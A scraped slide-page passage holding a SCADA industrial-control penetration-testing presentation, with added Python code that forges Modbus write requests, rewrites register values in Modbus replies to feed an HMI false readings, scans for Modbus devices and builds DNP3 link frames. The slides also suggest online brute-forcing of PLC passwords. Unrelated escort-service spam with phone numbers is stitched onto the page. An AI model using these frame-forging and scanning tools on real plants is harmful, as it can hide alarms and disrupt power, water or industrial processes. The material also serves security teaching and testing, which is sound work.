5- Conduct physical security surveys and assess all remote sites connected to the SCADA network to evaluate
their security.
6- Clearly define cyber security roles, responsibilities and authorities for managers, system administrators and
users.
7- Document the network architecture and identify systems that serve critical functions and require additional
levels of protection.
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice great
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
 
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
 
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfLike-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
 
4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx4.18.24 Movement Legacies, Reflection, and Review.pptx
4.18.24 Movement Legacies, Reflection, and Review.pptx
 
Science 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptxScience 7 Quarter 4 Module 2: Natural Resources.pptx
Science 7 Quarter 4 Module 2: Natural Resources.pptx
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptxMULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
MULTIDISCIPLINRY NATURE OF THE ENVIRONMENTAL STUDIES.pptx
 
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTSGRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
GRADE 4 - SUMMATIVE TEST QUARTER 4 ALL SUBJECTS
 
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptxCulture Uniformity or Diversity IN SOCIOLOGY.pptx
Culture Uniformity or Diversity IN SOCIOLOGY.pptx
 
ACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdfACC 2024 Chronicles. Cardiology. Exam.pdf
ACC 2024 Chronicles. Cardiology. Exam.pdf
 
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdfVirtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
Virtual-Orientation-on-the-Administration-of-NATG12-NATG6-and-ELLNA.pdf
 

Scada Industrial Control Systems Penetration Testing

  • 1. PENETRATION TESTING SCADA INDUSTRIAL CONTROL SYSTEMS By: Yehia Mamdouh
  • 2. THIS PRESENTATION WILL COVER:
  What is SCADA?
  What is it used for?
  What are the benefits of using SCADA?
  SCADA system concept
  How SCADA communication works
  SCADA protocols
  SCADA cyber security
  Types of SCADA networks
  Attack vectors
  Penetration testing methodology
  Conclusion
  • 3. WHAT IS A SCADA CONTROL SYSTEM?
  * SCADA: Supervisory Control and Data Acquisition. A type of control system that can be used to monitor and control many different kinds of equipment in many different kinds of environments.
  * In general, SCADA refers to one kind of industrial control system (ICS).
  • 4. WHERE CAN YOU FIND SCADA?
  * Electric power generation, transmission and distribution
  * Water and sewage
  * Buildings, facilities and environments
  * Manufacturing
  * Mass transit
  * Traffic signals
  • 5. BENEFITS OF SCADA
  Used for:
  1- Transmitting individual device status
  2- Managing energy consumption by controlling the devices
  3- Allowing direct control of power system equipment
  4- Controlling chemical plant processes, oil and gas pipelines, electrical generation and transmission equipment, manufacturing facilities, etc.
  Examples of controlled devices: motors, valves, pumps, relays, etc.
  Benefits:
  1- Identify and solve problems before they even start.
  2- Keep an eye on long-term trends and threats.
  3- Identify and attack bottlenecks and inefficiencies throughout the enterprise.
  4- Effectively manage bigger and more complicated processes with a smaller staff.
  • 6. SCADA SYSTEM CONCEPT
  SCADA workstation: the central SCADA console used by the human operator to issue commands, receive data in human-readable form, and monitor and control the process.
  HMI (Human-Machine Interface): the software and hardware that lets the human operator monitor the state of the process under control, modify control settings and manually override automatic control. The interface sits between the human operator and the commands relevant to the SCADA system. Typically runs on Windows, Linux or Unix.
  • 7. SCADA SYSTEM CONCEPT
  Data historian: collects and stores information from mission-critical systems so it can be extracted and analysed accurately (usually an SQL database).
  SCADA server / MTU (Master Terminal Unit): the device that issues commands to the Remote Terminal Units (RTUs) located at sites remote from the control centre, gathers the required data, then stores, processes and displays that information.
  RTU (Remote Terminal Unit): connects to sensors on the process, converts the sensor signals to digital data and sends it to the supervisory system.
  PLC (Programmable Logic Controller): automatically performs the main site control process that operates industrial equipment, such as control of machinery.
  • 8. HOW SCADA COMMUNICATION WORKS
  * The control operator at the workstation monitors the data and initiates control commands through the HMI.
  * The HMI is traditionally an application installed on workstations running Windows or Linux, and more recently a web application. These HMIs talk to the SCADA server.
  * The SCADA server collects data in the data historian, which is basically a database that the SCADA server pushes data to and in some cases pulls data from.
  * The SCADA server sends the appropriate signal to the correct RTU or PLC.
  * The RTU or PLC consults its pre-programmed logic to determine what to do with this control signal and operates the industrial equipment.
  * Equipment examples: relays, capacitor banks, feeder switches, actuators.
  • 9. System concept of SCADA (diagram): HMI (web interface) and workstation, data historian and SCADA server on the control side; a communication router links them over a wide area network to RTU/PLC units that read temperature level, pressure level, oil level, alarm and radioactivity level sensors. Modbus TCP/IP and DNP3 are the protocols that communicate between the SCADA server and the RTU/PLC.
  • 10. SCADA PROTOCOLS
  * We mentioned that the SCADA server sends signals to the RTU or PLC and vice versa. How can the central SCADA console receive information from sensors, which are very simple devices? That is where SCADA protocols come in.
  * The RTU collects data from sensors and converts the readings into a protocol, such as Modbus or DNP3, that can be transported across your communications network and back to you.
  * DNP3 (Distributed Network Protocol): used for communication between the master station and RTUs. Port 20000 TCP/UDP.
  * Modbus: typically used for SCADA-style communication between devices; implementations run over serial lines and over TCP/IP. Standard port 502 TCP.
  • 12. WHY IS SECURITY IMPORTANT IN CONTROL SYSTEMS?
  * Cyber intruders may find it easy to gain access to networked control systems.
  * More efficient methods of communication bring new risks that can cause disasters.
  * Control systems share common vulnerabilities with traditional information technology.
  * Control systems have recently adopted web technology, which is an interesting target for cyber attacks.
  * Data is carried by insecure protocols, some of them over TCP/IP.
  * Control systems have moved to Windows and Linux, which have known vulnerabilities.
  • 13. WHY IS SECURITY IMPORTANT IN CONTROL SYSTEMS?
  * The new protocols and communication standards that provide the increased connectivity are the same technologies that have been exploited and compromised in the Internet and networking domains.
  * Example: a Modbus/TCP request packet carries no authentication, no encryption, no security at all.
  * Attack classes: vulnerabilities in common protocols, attacks on field devices, database attacks, communications hijacking and man-in-the-middle attacks.
  • 14. REAL ATTACKS: in recent years, security incidents have been reported in control systems.
  • 15. Types of SCADA Networks
  • 16. TYPES OF SCADA NETWORKS
  Early or monolithic SCADA systems
  * The first SCADA systems held all operations in one computer, usually a mainframe.
  * Little control was exercised; most early SCADA functions were limited to monitoring sensors and flagging operations that went outside their alarm limits.
  * Limited to a single plant or facility. Like the software, SCADA hardware from one vendor was rarely usable in another vendor's SCADA system.
  • 17. TYPES OF SCADA NETWORKS
  Distributed SCADA systems
  * Shared control functions across multiple smaller (usually PC) computers connected by local area networks (LANs).
  * Shared real-time information and often performed small control tasks in addition to alerting operators to possible problems.
  • 18. TYPES OF SCADA NETWORKS
  Networked SCADA systems
  * Current SCADA systems are usually networked.
  * They communicate through wide area network (WAN) systems over phone or data lines and often transmit data between nodes through Ethernet or fibre-optic connections.
  * They make heavy use of Programmable Logic Controllers (PLCs) to monitor and make routine process adjustments.
  * The hardware tends to be more interchangeable, as PLC and other sub-unit vendors have standardised communications and other protocols to allow the user to choose the best component for their needs.
  • 19. TYPES OF SCADA NETWORKS
  Internet of Things (IoT)
  * A data model defines the types of data that will be monitored and allows new types to be added quickly and easily as new smart objects join the process.
  * Allows combinations of smart things/objects and sensor network technologies.
  * This communication brings physical business benefits such as high-resolution management of resources and products, better collaboration between enterprises, and improved life-cycle management.
  • 21. ATTACK VECTORS
  * SCADA systems are vulnerable to the same threats as any TCP/IP-based system.
  * SCADA administrators and industrial systems analysts are often deceived into thinking that, because their industrial networks are separate systems, they are safe from outside attacks.
  * PLCs and RTUs are usually polled over third-party, vendor-specific networks and protocols such as Modbus and DNP3, usually over phone lines, leased private frame relay circuits or satellite systems.
  * Security in an industrial network can be compromised in many places along the system and is most easily compromised at the SCADA host or control-room level.
  • 22. ATTACK VECTORS
  ++ Once the corporate network is compromised, any IP-based device or computer system can be accessed.
  ++ 24/7 connectivity provides an opportunity to attack the SCADA host system, which can be used to:
  * Launch a denial of service (DoS) attack to crash the SCADA server, leading to a shutdown condition.
  * Delete system files on the SCADA server (system downtime and loss of operations).
  * Plant a Trojan and take complete control of the system.
  * Log company-sensitive operational data for personal use or for competitors.
  Attack vectors that should be addressed:
  1- Backdoors and holes in the network perimeter
  2- Vulnerabilities in common protocols
  3- Attacks on field devices
  4- Database attacks
  5- Communications hijacking and man-in-the-middle attacks
  • 23. ATTACK VECTORS: backdoors and holes in the network perimeter
  1- Modern networks in the control system arena often have inherent capabilities that are deployed without sufficient security analysis and can provide access to attackers once they are discovered.
  2- Network components such as firewalls, public-facing services and wireless access each carry their own security vulnerabilities.
  3- Remotely located control system elements can be reached through remote communication links; if these systems are based on commercial operating systems, the attacks can be DDoS, privilege escalation exploits or Trojan horses.
  • 24. ATTACK VECTORS: backdoors and holes in the network perimeter
  4- Organisations in many CI/KR (critical infrastructure / key resources) sectors provide data to customers and providers through publicly accessible services, such as load expectation calculations or billing futures information. As these services are in the public domain, they are often accessible from the Internet with little or no user access limitation.
  5- If the relationship between the firewall and the web server is not deployed correctly, unauthorised data can flow from the external side into the internal domain. If the attacker compromises the trusted web server, the attacker has a channel to the internal services (or control system) LAN.
  • 25. ATTACK VECTORS: attacks using common protocols
  1- Microsoft Windows XP, a platform commonly used in control systems, brings its well-known security issues with it.
  2- Control systems built on modern networking technologies inherit those technologies' security vulnerabilities. Even though many of these vulnerabilities have solutions and available workarounds, deploying those mitigations in control system architectures is not always feasible.
  • 26. ATTACK VECTORS: attacks on the control system via field devices
  1- Control system architectures usually provide remote access to terminal end points and devices in a number of ways, including telephone or dedicated lines, to allow collection of operational and maintenance data.
  2- Modern equipment has embedded file servers and web servers to facilitate robust communications. These devices are part of an internal, trusted domain, so access to them can give an attacker an unauthorised vector into the control system architecture.
  3- RTUs are an extension of the control domain, so attackers can add these field devices to their list of viable targets during the reconnaissance and scanning phases of the attack.
  4- Once a device is compromised, the attacker can leverage control over the device and escalate privileges.
  • 27. ATTACK VECTORS: database and SQL injection attacks
  1- Database applications have become core components of control systems and their associated record-keeping utilities.
  2- Databases used by control systems are often connected to databases on the business network, and most use SQL. The information they contain makes them high-value targets for any attacker.
  3- Attackers can exploit the communication channel between the two networks and bypass the security mechanisms that protect the control system environment.
  4- Corrupted database content can affect data acquisition servers, historians and even the operator's HMI console. Control system databases are especially sensitive because operations rely on data accuracy and integrity.
  • 28. ATTACK VECTORS: man-in-the-middle attacks
  1- An attacker who can re-route data in transit on a network, capture and analyse critical traffic that is sent in plaintext, and reverse engineer any unique protocols can gain command over control communications.
  2- Combining all of these, a MITM attack is executed.
  3- As the attack is on the control domain, this plaintext traffic can be harvested (sniffed) and taken offline for analysis and review.
  4- Using ARP poisoning and collecting traffic, the attacker can establish and maintain complete control over communications in the network, for example preventing the HMI from issuing alarms.
  5- MITM can sit between the HMI and the RTU because of weak protocols such as Modbus.
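The Modbus/TCP frame described on slide 10 and the "no authentication, no encryption" point of slide 13 are what make the man-in-the-middle attack above so cheap. The following is an added example, not code from the presentation: it builds the MBAP header and PDU by hand, decodes a Read Holding Registers reply, and shows the one-line edit an on-path attacker needs to change the value the HMI will display. The sample reply bytes, the register values and the unit id are constructed for illustration.

```python
"""Modbus/TCP framing: the protocol carries no credentials and no MAC, so
anyone on the path can read registers, write registers, or rewrite a reply
before the HMI sees it."""
import struct

MODBUS_TCP_PORT = 502            # standard port, as on slide 10
READ_HOLDING_REGISTERS = 0x03
WRITE_SINGLE_REGISTER = 0x06


def mbap_header(transaction_id: int, unit_id: int, pdu_len: int) -> bytes:
    """MBAP header: transaction id, protocol id (0 = Modbus), length of
    unit id + PDU, unit id. There is no field for credentials or a MAC."""
    return struct.pack(">HHHB", transaction_id, 0, pdu_len + 1, unit_id)


def build_read_holding_registers(tid: int, unit: int, start: int, count: int) -> bytes:
    pdu = struct.pack(">BHH", READ_HOLDING_REGISTERS, start, count)
    return mbap_header(tid, unit, len(pdu)) + pdu


def build_write_single_register(tid: int, unit: int, address: int, value: int) -> bytes:
    """A write needs nothing more than a read does: the same 12 bytes, no login."""
    pdu = struct.pack(">BHH", WRITE_SINGLE_REGISTER, address, value)
    return mbap_header(tid, unit, len(pdu)) + pdu


def parse_frame(frame: bytes) -> dict:
    """Split a Modbus/TCP frame into MBAP fields, function code and data."""
    if len(frame) < 8:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError("protocol id %d is not Modbus" % proto)
    if length != len(frame) - 6:
        raise ValueError("MBAP length %d does not match frame" % length)
    return {"tid": tid, "unit": unit, "function": frame[7], "data": frame[8:]}


def parse_read_registers_response(frame: bytes) -> dict:
    """Decode a Read Holding Registers reply (or the exception reply to it)."""
    f = parse_frame(frame)
    if f["function"] & 0x80:                      # exception: fc | 0x80, one code byte
        f["exception"] = f["data"][0]
        return f
    if f["function"] != READ_HOLDING_REGISTERS:
        raise ValueError("unexpected function 0x%02X" % f["function"])
    byte_count = f["data"][0]
    payload = f["data"][1:1 + byte_count]
    if len(payload) != byte_count or byte_count % 2:
        raise ValueError("truncated register data")
    f["registers"] = list(struct.unpack(">%dH" % (byte_count // 2), payload))
    return f


def rewrite_register_in_reply(frame: bytes, index: int, new_value: int) -> bytes:
    """What an on-path attacker (ARP poisoning, rogue gateway) can do to a reply:
    overwrite one register value so the HMI shows a 'normal' reading. Nothing in
    the Modbus frame has to be recomputed; only TCP's checksum changes, and the
    attacker's own stack redoes that when it forwards the segment."""
    f = parse_frame(frame)
    if f["function"] != READ_HOLDING_REGISTERS:
        raise ValueError("not a Read Holding Registers reply")
    offset = 8 + 1 + 2 * index                    # MBAP(7) + fc(1) + byte count(1)
    if index < 0 or offset + 2 > len(frame):
        raise IndexError("register index out of range")
    return frame[:offset] + struct.pack(">H", new_value) + frame[offset + 2:]


# Constructed sample reply (not a capture): unit 1 answers a read of two
# holding registers with the values 500 (0x01F4) and 0.
SAMPLE_REPLY = bytes.fromhex("0001" "0000" "0007" "01" "03" "04" "01F4" "0000")

if __name__ == "__main__":
    print(build_read_holding_registers(1, 1, 0, 2).hex())
    print(parse_read_registers_response(SAMPLE_REPLY)["registers"])
    forged = rewrite_register_in_reply(SAMPLE_REPLY, 0, 80)
    print(parse_read_registers_response(forged)["registers"])
```

The rewrite keeps the frame length and transaction id unchanged, so the HMI's Modbus stack accepts the forged reply exactly as it would the real one; the only defence at this layer is something outside Modbus (an encrypted tunnel, or a gateway that validates what crosses it).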
  • 30. PENETRATION TESTING METHODOLOGY
  The penetration testing methodology we use in control systems is like a normal network penetration test. How? We are dealing with devices, operating systems (Windows, Linux), protocols over TCP, applications and SQL databases, and firewalls.
  Audit identification:
  Devices and networks: router configs, router tables, switch tables, physical cable checks, packet sniffing
  Services: local port verification (netstat)
  Vulnerabilities: local banner grabbing
  Perimeter: identify all external connections
  * Review firewall rules
  * Review remote access methods
  * Check for wireless networks
  * Check physical access
  • 31. PENETRATION TESTING METHODOLOGY
  Network infrastructure: review router configs, review switch tables, conduct physical cable checks, conduct packet sniffing and analysis
  Host operating systems: review patch level, review password quality, review share and directory permissions, review remote access
  Applications: review ports and services, review OS credentials, review remote access, consider code review
  PLCs, RTUs, etc.: review patch levels, review password quality, conduct packet sniffing
  • 32. PENETRATION TESTING METHODOLOGY: scanning / discovery
  Some available tools:
  * plcscan - scans Modbus devices
  * modscan - scans Modbus devices
  * Nmap (be careful: a single Nmap scan can crash a system)
  * Metasploit modules for Modbus detection
  * Most PLCs (communication modules) have no ability to filter by source IP address, so we can use Python scripts or John the Ripper to brute-force PLC passwords online.
  * Device and station discovery: scan supported devices and stations, change station names, change IP, netmask and gateway, request full network info.
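Because an aggressive scan can crash a controller, the discovery step is better done with one well-formed Modbus request per host than with a generic port sweep. The following is an added example, not one of the tools listed above: it sends a single Read Device Identification request (function 0x2B, MEI type 0x0E), decodes the vendor, product and revision objects, and paces the hosts serially. The sample reply bytes and the vendor strings in them are constructed; the unit id 0xFF is the usual choice for a directly connected Modbus/TCP device, and a serial device behind a gateway needs its real unit id instead.

```python
"""Gentle Modbus/TCP discovery: one Read Device Identification request per
host, with a delay between hosts, instead of a fast port/version sweep."""
import socket
import struct
import time

MODBUS_TCP_PORT = 502
ENCAPSULATED_INTERFACE_TRANSPORT = 0x2B
MEI_READ_DEVICE_ID = 0x0E
READ_DEVICE_ID_BASIC = 0x01     # VendorName, ProductCode, MajorMinorRevision
OBJECT_NAMES = {
    0x00: "VendorName", 0x01: "ProductCode", 0x02: "MajorMinorRevision",
    0x03: "VendorUrl", 0x04: "ProductName", 0x05: "ModelName",
    0x06: "UserApplicationName",
}


def build_read_device_id(tid: int, unit: int = 0xFF,
                         read_code: int = READ_DEVICE_ID_BASIC, object_id: int = 0x00) -> bytes:
    pdu = bytes([ENCAPSULATED_INTERFACE_TRANSPORT, MEI_READ_DEVICE_ID, read_code, object_id])
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def parse_read_device_id(frame: bytes) -> dict:
    """Decode the identification objects (vendor, product code, revision ...)."""
    if len(frame) < 9:
        raise ValueError("frame too short")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:
        raise ValueError("bad MBAP header")
    pdu = frame[7:]
    if pdu[0] == ENCAPSULATED_INTERFACE_TRANSPORT | 0x80:
        # exception 0x01 (illegal function) is the usual answer from devices
        # without device identification support; they are still Modbus devices
        raise ValueError("Modbus exception 0x%02X" % pdu[1])
    if len(pdu) < 7 or pdu[0] != ENCAPSULATED_INTERFACE_TRANSPORT or pdu[1] != MEI_READ_DEVICE_ID:
        raise ValueError("not a Read Device Identification reply")
    conformity, more_follows, num_objects = pdu[3], pdu[4], pdu[6]
    objects, pos = {}, 7
    for _ in range(num_objects):
        if pos + 2 > len(pdu):
            raise ValueError("truncated object list")
        obj_id, obj_len = pdu[pos], pdu[pos + 1]
        value = pdu[pos + 2:pos + 2 + obj_len]
        if len(value) != obj_len:
            raise ValueError("truncated object %d" % obj_id)
        objects[OBJECT_NAMES.get(obj_id, "Object%02X" % obj_id)] = value.decode("ascii", "replace")
        pos += 2 + obj_len
    return {"unit": unit, "conformity": conformity,
            "more_follows": bool(more_follows), "objects": objects}


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ValueError("connection closed mid-frame")
        buf += chunk
    return buf


def probe_device(host: str, port: int = MODBUS_TCP_PORT, unit: int = 0xFF,
                 timeout: float = 2.0) -> dict:
    """One connection, one request, one reply; never more than that per host."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_read_device_id(1, unit))
        header = _recv_exact(sock, 7)
        length = struct.unpack(">H", header[4:6])[0]
        body = _recv_exact(sock, length - 1)        # length counts the unit id already read
        return parse_read_device_id(header + body)


def scan(hosts, delay: float = 1.0) -> dict:
    """Serial, paced scan: deliberately no threads and a sleep between hosts,
    because fragile controller stacks have hung under parallel probes."""
    results = {}
    for host in hosts:
        try:
            results[host] = probe_device(host)
        except (OSError, ValueError) as exc:
            results[host] = "error: %s" % exc
        time.sleep(delay)
    return results


# Constructed reply (not a capture) from a hypothetical unit 1: vendor "ACME",
# product code "PLC-1", revision "1.2", all three basic objects in one answer.
SAMPLE_DEVICE_ID_REPLY = bytes.fromhex(
    "00010000001A01"            # MBAP: tid 1, proto 0, length 26, unit 1
    "2B0E0101000003"            # fc 0x2B, MEI 0x0E, code 1, conformity 1, more 0, next 0, 3 objects
    "000441434D45"              # 0x00 VendorName "ACME"
    "0105504C432D31"            # 0x01 ProductCode "PLC-1"
    "0203312E32"                # 0x02 MajorMinorRevision "1.2"
)

if __name__ == "__main__":
    print(parse_read_device_id(SAMPLE_DEVICE_ID_REPLY))
```

A device that answers with exception 0x01 still tells you it speaks Modbus; a host that accepts the TCP connection but never answers is worth noting too, and worth not probing again until someone on the plant side has confirmed it is safe.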
  • 33. PENETRATION TESTING METHODOLOGY: analyse protocols
  How do the protocols live on the network?
  * Not blocked by firewalls/switches
  * Accessible between LAN segments
  * Work from the data link layer up to the application layer
  * Easy to detect, easy to analyse
  So with the available tools we can: detect devices and their protocols; monitor state and commands; inject and modify reply packets in real time.
  Sniffing traffic: Wireshark, tcpdump, Python, hex viewer
  • 34. PENETRATION TESTING METHODOLOGY: analyse protocols
  Modbus
  * Using the web is often the easiest way in: 80% of Modbus/TCP devices have web interfaces, and other research shows most devices run Windows 2000.
  DNP3
  * Has source and destination addresses that can be useful in man-in-the-middle attacks, such as:
  1- Turning off unsolicited reporting to stifle alarms
  2- Issuing unauthorised stops, restarts or other functions that could disrupt specific operations
  * Implementations typically do not employ encryption, authentication or authorisation; DNP3 devices simply assume that all messages are valid.
  • 35. PENETRATION TESTING METHODOLOGY: analyse protocols, DNP3
  Passive network reconnaissance: with appropriate access, capture and analyse DNP3 messages. This provides information about network topology, device functionality, memory addresses and other data.
  Rogue test: install a man-in-the-middle device between the master and the outstations that can read, modify and fabricate DNP3 messages and/or network traffic.
  Other attacks target the data link and application layers.
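The passive reconnaissance and rogue-device tests above both rest on the same fact: the DNP3 link-layer header carries the source and destination addresses in the clear, protected only by a CRC that any party can recompute. The following is an added example, not code from the presentation: it implements the DNP3 CRC, parses and builds the 10-byte link header, and tallies which addresses talk to which over a set of captured frames. The reset-link frame used as input is the standard 05 64 example whose CRC the function reproduces; the ACK reply is constructed with the same helper, and parsing stops at the header (user-data blocks with their own CRCs are not decoded here).

```python
"""DNP3 link-layer frames for passive reconnaissance: addresses in the clear,
a CRC instead of a MAC, so capturing traffic reveals the master/outstation
topology and forging a header needs no secret."""
import struct

DNP3_START = b"\x05\x64"
DNP3_CRC_POLY = 0xA6BC          # reflected form of the DNP3 polynomial 0x3D65

PRIMARY_FUNCTIONS = {0: "RESET_LINK_STATES", 2: "TEST_LINK_STATES", 3: "CONFIRMED_USER_DATA",
                     4: "UNCONFIRMED_USER_DATA", 9: "REQUEST_LINK_STATUS"}
SECONDARY_FUNCTIONS = {0: "ACK", 1: "NACK", 11: "LINK_STATUS", 15: "NOT_SUPPORTED"}


def dnp3_crc(data: bytes) -> int:
    """DNP3 CRC-16: poly 0x3D65, bit-reflected, init 0, result inverted."""
    crc = 0
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ DNP3_CRC_POLY if crc & 1 else crc >> 1
    return (~crc) & 0xFFFF


def build_link_header(control: int, dest: int, src: int, length: int = 5) -> bytes:
    """start(2) length(1) control(1) dest(2) src(2) crc(2); addresses little-endian.
    length = 5 header bytes + user data bytes (CRCs are not counted)."""
    body = DNP3_START + struct.pack("<BBHH", length, control, dest, src)
    return body + struct.pack("<H", dnp3_crc(body))


def header_crc_ok(frame: bytes) -> bool:
    return len(frame) >= 10 and dnp3_crc(frame[:8]) == struct.unpack("<H", frame[8:10])[0]


def parse_link_header(frame: bytes) -> dict:
    if len(frame) < 10 or frame[:2] != DNP3_START:
        raise ValueError("not a DNP3 frame")
    if not header_crc_ok(frame):
        raise ValueError("header CRC mismatch")
    length, control, dest, src = struct.unpack("<BBHH", frame[2:8])
    primary = bool(control & 0x40)                # PRM bit: 1 = initiating station
    fc = control & 0x0F
    table = PRIMARY_FUNCTIONS if primary else SECONDARY_FUNCTIONS
    return {
        "length": length,
        "from_master": bool(control & 0x80),      # DIR bit: 1 = sent by the master
        "primary": primary,
        "fcb": bool(control & 0x20),
        "fcv_or_dfc": bool(control & 0x10),
        "function": table.get(fc, "UNKNOWN_%d" % fc),
        "dest": dest,
        "src": src,
    }


def recon(frames) -> dict:
    """Map (src, dest) pairs to the link functions seen between them. Over a
    capture this shows which address is the master, which are outstations,
    and what they ask of each other; nothing has to be decrypted."""
    topology = {}
    for frame in frames:
        try:
            h = parse_link_header(frame)
        except ValueError:
            continue                              # not DNP3, or corrupted: skip
        topology.setdefault((h["src"], h["dest"]), set()).add(h["function"])
    return topology


# Standard example frame: the master at address 1024 resets the link of
# outstation 1 (control 0xC0 = DIR, PRM, function 0). The CRC is checked
# by header_crc_ok(); the reply in __main__ is constructed with the helper.
RESET_LINK_FRAME = bytes.fromhex("056405C001000004E921")

if __name__ == "__main__":
    print(parse_link_header(RESET_LINK_FRAME))
    print(recon([RESET_LINK_FRAME, build_link_header(0x00, 1024, 1)]))
```

Because build_link_header() produces a frame that every outstation will accept, the same 20 lines are all a rogue device needs to issue the link-layer resets and stops mentioned on slide 34; a CRC proves only that the bytes were not corrupted in transit, never who sent them.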
  • 36. PENETRATION TESTING METHODOLOGY: data manipulation
  Web application testing and SQL injection: as SCADA uses web applications on the HMI and SQL in the database, we can test them for possible vulnerabilities.
  Available tools:
  * Modlib - Scapy extension [Python]
  * OpenDNP3 - library [C++]
  * Metasploit modules
  • 38. SCADA SECURITY
  Creating demilitarised zones (DMZs): multiple DMZs can be created for separate functions and access privileges, such as peer connections, the data historian and the Inter-Control Center Communications Protocol (ICCP) server in SCADA systems.
  Firewalls: properly configured and coordinated, firewalls can protect passwords, IP addresses, files and more.
  Proxy servers: a proxy server is an Internet server that acts as a firewall, mediating traffic between a protected network and the Internet.
  Security policy: effective security policies and procedures are the first step to a secure control system network. Many of the same policies
  Security training: providing the staff who work in the facility with security training is essential for preventing physical and social engineering attacks.
  • 39. SCADA SECURITY
  1- Identify all connections to SCADA networks
  2- Disconnect unnecessary connections to the SCADA network
  3- Remove or disable unnecessary services
  4- Implement internal and external IDS and establish 24-hour incident monitoring
  5- Conduct physical security surveys and assess all remote sites connected to the SCADA network to evaluate their security
  6- Clearly define cyber security roles, responsibilities and authorities for managers, system administrators and users
  7- Document the network architecture and identify systems that serve critical functions and require additional levels of protection